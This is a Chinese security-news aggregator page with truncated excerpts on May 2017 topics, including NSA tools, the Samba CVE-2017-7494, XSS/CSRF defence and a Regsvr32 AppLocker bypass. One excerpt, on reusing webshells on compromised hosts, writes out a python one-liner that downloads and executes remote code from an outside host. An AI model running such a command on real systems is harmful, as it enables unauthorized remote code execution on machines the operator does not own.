记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

LoadLibrary:一款能够允许Linux程序从DLL文件中加载或调用函数的工具

介绍 今天给大家推荐的这个代码库将允许原生Linux程序从一个WindowsDLL文件中加载或调用功能函数。下面是一个简单的演示示例,我将Windows Defender“移植”到了Linux平台。 $ ./mpclient eicar.com main(): Scanning eicar.com... EngineScanCallback(): Scanning input EngineScanCallback(): Threat Virus:DOS/EICAR_Test_Fileidentified. 工作机制 项目源码的peloader目录中包含一个来自ndiswrapper的自定义PE/COFF加载器,这个库可以完成重定位和导入操作,并提供了一个API(dlopen)。注:代码支持使用gdb
发布时间:2017-05-30 02:00 | 阅读:3816 | 评论:0 | 标签:工具

NSA EsteemAudit工具或会触发WannaCry般的攻击

NSA EsteemAudit工具或会触发WannaCry般的攻击。enSilo安全专家近日发布一款针对NSA EsteemAudit工具的免费补丁。EsteemAudit是一款针对运行微软Windows Server 2003 / Windows XP电脑RDP服务(端口3389)的黑客工具。据估计,至少有2.4万个系统存在易被EsteemAudit攻击的风险。网络安全环境目前危机重重WannaCry勒索病毒余波未了,在这之后还出现了NSA黑客工具被利用实施攻击的案例。例如“永恒之石”。近段时间,网络安全界可谓一波未平一波又起,容不得半点掉以轻心,“影子经纪人”(Shadow Brokers)泄露的NSA文件还包括大量其它危险的漏洞利用,而该组织声称从今年6月初
发布时间:2017-05-30 01:30 | 阅读:3969 | 评论:0 | 标签:无

Web开发者安全速查表

Web开发者安全速查表。想要开发出一个安全的、健壮的Web应用其实是非常困难的,如果你觉得这实现起来非常简单的话,那么你一定是一个X炸天的程序猿,要么你就是在白日做梦……  写在前面的话如果你觉得你可以在一个月之内开发出一款集使用价值、用户体验度、以及安全性为一身的产品,那么在你将产品原型真正推上市场之前,请一定要三思啊!当你仔细核查了本文给出的安全小贴士之后,你可能会发现你在产品的开发阶段跳过了很多重要的安全步骤。有的时候,也许你应该对你的用户坦诚一点,你应该诚实地告诉他们这款产品还没有完全搞定,还有很多的安全问题亟待解决。下面的这份速查表非常简洁,而且绝对还有很多东西没有涉及到。就我个人而言,我从事安全Web应用开发工作已经超过14年了,而本文给出的小贴士都是
发布时间:2017-05-30 01:30 | 阅读:3793 | 评论:0 | 标签:无

windows10使用自带重装方法

现在许多人觉得自己的系统是否十分卡顿?或者出现各种各样的问题需要重装?小编为你介绍windows10重装方法已激活windows10系统联网状态1、打开右下角通知栏区域的通知图标  2、打开设置  3、打开更新和安全  4、打开恢复  5、点击重置此电脑  6、这里你可以选择是否保留系统文件  7、选择保留你可以保留现在的设置,文件,软件  8、选择删除你可以选择删除系统盘(一般是C盘)还是删除所有盘符的文件  重装之后系统还是激活的,请放心!
发布时间:2017-05-30 01:30 | 阅读:4012 | 评论:0 | 标签:无

webshell的另一用途

webshell的另一用途。不知道大家都用不用www.yas*****.com,旧版是www.bug****.net。挂载各种插件,不过扫描要添加在线引擎节点。你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yasc****r.com/xxxxxyyyyyzzzzzz').read())" 来上线。我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈好吧。这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。1.选个Pytho
发布时间:2017-05-30 01:30 | 阅读:3472 | 评论:0 | 标签:无

[原]CISSP读书笔记-专题域

CISSP 认证信息系统安全专家,该认证考试涵盖了CBK8个域的知识点,共有21章节。使用于负责设计和维护组织内安全基础设施的安全专业人员。 一、安全和风险管理 1、通过原则和策略的安全治理 2、人员安全和风险管理概念 3、业务连续性计划 4、法律、法治、和合规性 二、资产安全 5、保护资产的安全 三、安全工程 6、密码学与对称算法 7、KPI和密码学应用 8、安全模型的原则、涉及和功能 9、安全脆弱性、威胁和对施 10、物理安全需求 四、通信和网络安全 11、网络安全架构与保护网络组件 12、安全通信和网络攻击 五、身份和访问管理 13、管理身份与认证 14、控制和监控访问 六、安全评估和测试 15、安全评估和测试 七、安全运营 16、管理安全运营 17、事件预
发布时间:2017-05-29 10:25 | 阅读:7288 | 评论:0 | 标签:无

TLS 1.3如何用性能为HTTPS正名

序•魔戒再现 几天前,OpenSSL官方宣布即将发布的新版本 (OpenSSL 1.1.1) 将会提供 TLS 1.3 的支持,而且还会和之前的 1.1.0 版本完全兼容,这当然是个好消息。如果说 HTTP/2 是当前互联网 Web 发展的讨论热点之一,那么下一个热点应该就是 TLS 1.3 了。 谈到 TLS 那么就不得不说回 HTTPS,2016 年应该算是国内站点使用 HTTPS 激增的一年,从 Google Trend 上也可以看出该关键词的搜索热度从 2016 年开始飙升。不光如此,所有从事互联网 Web 技术相关的开发人员,也应该能够明显感受到,身边使用 HTTPS 的网站越来越多了。 为什么近两年来 HTTPS 被大家更广泛的应用? 一方面得益于「中国特色」的网络安全环境,运营商层出不穷的各种劫
发布时间:2017-05-29 09:05 | 阅读:7756 | 评论:0 | 标签:WEB安全 其他 tls

使用PHP与SQL搭建可搜索的加密数据库

我们从一个简单的场景开始(这可能与很多地方政府或医疗保健应用非常相关):您正在建立一个新系统,需要从其用户收集社会保障号码(SSN)。规则和常识都规定用户的SSN应该在存储时加密。鉴于他们的SSN,员工需要能够查看用户帐号。我们先来看看这个问题的一些比较明显的答案。不安全(或其他不明智)的答案是非随机加密,大多数团队(特别是没有安全或加密专家的团队)最明显的答案将是这样做:<?phpclass InsecureExampleOne{    protected $db;    protected $key;     public funct
发布时间:2017-05-28 16:45 | 阅读:10778 | 评论:0 | 标签:技术 加密

利用Regsvr32绕过Applocker的限制策略

AppLocker的设计初衷就是为了帮助管理员Windows安装文件,可执行文件以及用户脚本的执行。从各种各样的奇淫巧计中我们得知这些限制是可以绕过的,例如在windows环境下通过AppLocker配置以限制脚本的执行,利用regsrv32命令行工具就可以完成绕过。 regsvr32是windows命令行实用工具用于注册动态链接库文件,向系统注册控件或者卸载控件的命令。Casey Smith发现通过调用regsrv32实用程序执行一条命令或者.sct文件有可能绕过AppLocker的脚本规则。由于该实用程序是由微软官方签名的所以好处多多啦,支持TLS加密,遵循重定向方式,不会在磁盘上留下痕迹。 以下脚本为Casey Smith提供的代码修改版,我们仅调用 calc.exe或cmd.exe。如果允许使用命令行
发布时间:2017-05-28 16:10 | 阅读:11288 | 评论:0 | 标签:终端安全

NodeJs的包漏洞扫描与漏洞测试攻击

一个典型的Node应用可能会有几百个,甚至上千个包依赖(大部分的依赖是间接的,即下载一个包,这个包会依赖其他的好多包),所以最终的结果是,应用程序就会像是这个样子的:和所依赖的包相比,自己写的代码量就显得少的可怜,引入了大量的包成为了应用程序的代码,也就引入了一些不可预知的隐患,比如我们是否知道这些包是否是安全的,如果我们引入的包是安全的,那这些包自己引入的第三方的包也是安全的吗?如果不是,那么这些隐患也会就成了应用程序的小后门,让黑客可以随意进出。所以我们需要一个工具能够扫描这些包的漏洞,减少自己应用程序被黑客攻击的可能性。在这里我推荐我目前在用的snyk, https://snyk.io/ ,这里面可以有两种方式来检测我们应用程序的漏洞,一种是从代码仓库中直接引入进来,目前支持的代码仓库
发布时间:2017-05-28 15:40 | 阅读:11536 | 评论:0 | 标签:扫描 漏洞

XSS 和 CSRF 攻击的一些非常规防御方法

一说到安全,大家总会特别敏感,尤其是有相当部分的前端开发者并不了解安全相关的知识,颇有谈虎色变的感觉。具体到前端安全这个话题呢,又有些说不清道不明,因为大部分的防御方案,总少不了后端的参与,也有开发者慢慢觉得好像安全都应该由后端来关注了。其实不然,起码 XSS CSRF 这一类的安全问题前端是一定要了解它们的原理和防御方法的。从防御方法上来说,XSS 和 CSRF 的防御在业界都有比较成熟的方案了。本文将记录一些比较新的防御方案,可能有一些比较老的书籍或者文章中不会提及这些方法。XSSXSS 全称 Cross Site Scripting ,跨站脚本攻击,因为 CSS 这名字老早就被样式表拿走了,大家都在 web 这个领域,重名又不好看,所以只好起了个名字叫 XSS 了。说实话从 XSS 干的事来讲,其实并不太
发布时间:2017-05-28 15:40 | 阅读:8591 | 评论:0 | 标签:xss CSRF

被忽视的Web安全漏洞:如何识别和解决?

在Web安全方面,面对各种安全漏洞,IT和安全专业人员通常采取防御措施,而缺少积极主动的措施。在各种类型和规模的企业中,有些网络安全人员(包括CIO和其他高管)称他们会定期扫描其网站和应用。有些人称他们的应用是正在进行的渗透测试工作的一部分,并感觉这可确保安全性。还有些人认为管理web安全漏洞不是他们的职责,因为网站和应用托管在云端。我理解前两种做法,但第三种则不可原谅。企业需要专注于安全工作,特别是安全评估,对web环境的评估可确保安全性,而无论它们托管在哪里。这个问题是可以解决的。首先,现在有很多非常好的在线资源可提升网络安全状态,例如OWASP Top 20和OWASP WebGoat项目。我发现有些人从未听说过OWASP,他们不了解它可为其信息安全计划带来的价值。如果您希望提高网络安全状态,对于初学者来
发布时间:2017-05-28 15:40 | 阅读:8438 | 评论:0 | 标签:漏洞

Samba远程代码执行漏洞(CVE-2017-7494)-SambaCry分析报告

2017年5月24日Samba官方发布了安全公告,新发布的Samba 4.6.4修复了一个严重的代码执行漏洞(CVE-2017-7494),该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。在rpc_server/srv_pipe.c中的存在一个验证BUG,攻击者可以利用客户端上传恶意动态库文件到具有可写权限的共享目录中,之后发出请求,使服务器加载Samba运行目录以外的非法模块,导致恶意代码执行。Samba,是种用来让UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做链接的自由软件。很多企业或个人的 NAS(Network Attached Storage),路由器和其他IOT设备存储解决方案会选择开源软件Samba提供数据访问服务。I
发布时间:2017-05-28 15:40 | 阅读:9000 | 评论:0 | 标签:漏洞

常见网络攻击--XSS && CSRF

XSSXSS全称跨站脚本攻击(Cross Site Scripting),顾名思义,就是通过向某网站写入js脚本来实现攻击。如果熟悉或了解SQL注入的话,这么一说大概就十分清楚了。如果是刚接触web开发的同学,可能乍想不明白,自己的网站,别人如何写入js脚本?开发中也会忽视容易被注入的点,导致XSS漏洞。常见攻击形式1. 非持久型攻击有些网站的网页内容与url参数相关,比如很多搜索结果页。如搜狗搜索xss: https://www.sogou.com/web?query=xss 。那么网页中将存在会大量的a标签中带有 query=xss 。假如搜狗不给参数做任何安全处理,此时只要把 query=xss 改成 query=xss"a/
发布时间:2017-05-28 15:40 | 阅读:8759 | 评论:0 | 标签:xss CSRF

Windows又有新漏洞:一张图片让系统变慢或崩溃

科客点评:现在的病毒已经精明很多,大家伙还是为电脑装上杀软,并定时更新系统吧。5月份各种电脑病毒肆虐,无论是永恒之蓝还是永恒之岩,都着实让我们回想起以前那个杀毒软件还不普及的年代。而根据The Verge在5月27日报道,Windows 7系统又发现了一个新漏洞,不仅会减慢Win 7甚至是Win 8设备的运行速度,还会引起系统崩溃。这就真的很烦人了,毕竟电脑卡顿几乎是每个人都会遇到的难题,要是以后电脑一卡顿就意味着有可能感染病毒,那岂不Windows用户都会终日人心惶惶?根据Ars Technica的报告,这个漏洞会允许恶意网站在系统目录中建一个名为“MFT”的文件。Windows系统在NTFS格式下通常可以处理“$MFT”的特殊数据文件,而Windows 7和W
发布时间:2017-05-28 15:40 | 阅读:11625 | 评论:0 | 标签:漏洞

危害极为严重 安卓手机被曝光最新系统级别漏洞

最新安卓手机系统漏洞有什么危害?安卓手机系统因为其开源的原因,导致安卓系统本身有很多难以被发现的漏洞,最新的消息显示,安卓在系统级别有着一个极为严重的漏洞,而这一漏洞涉及到的安卓手机设备在全球可能有数亿台。据台湾“联合新闻网”报道,应用在数以亿计Android装置的软件被发现严重安全漏洞,将导致攻击者能完整存取手机资料。Checkpoint公司研究人员揭露,美国高通公司(Qualcomm)生产应用在芯片组上的软件,有危及资料安全疑虑。报道称,目前虽无证据显示有黑客利用这个漏洞,但Checkpoint公司移动装置管理部负责人萧洛夫(Michael Shaulov)表示:“我确定接下来3到4个月内,就会发现有人利用这项弱点。”有疑虑的包括掌控绘图和密码指令的软件,而后
发布时间:2017-05-28 15:40 | 阅读:7401 | 评论:0 | 标签:漏洞

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

推广

工具

标签云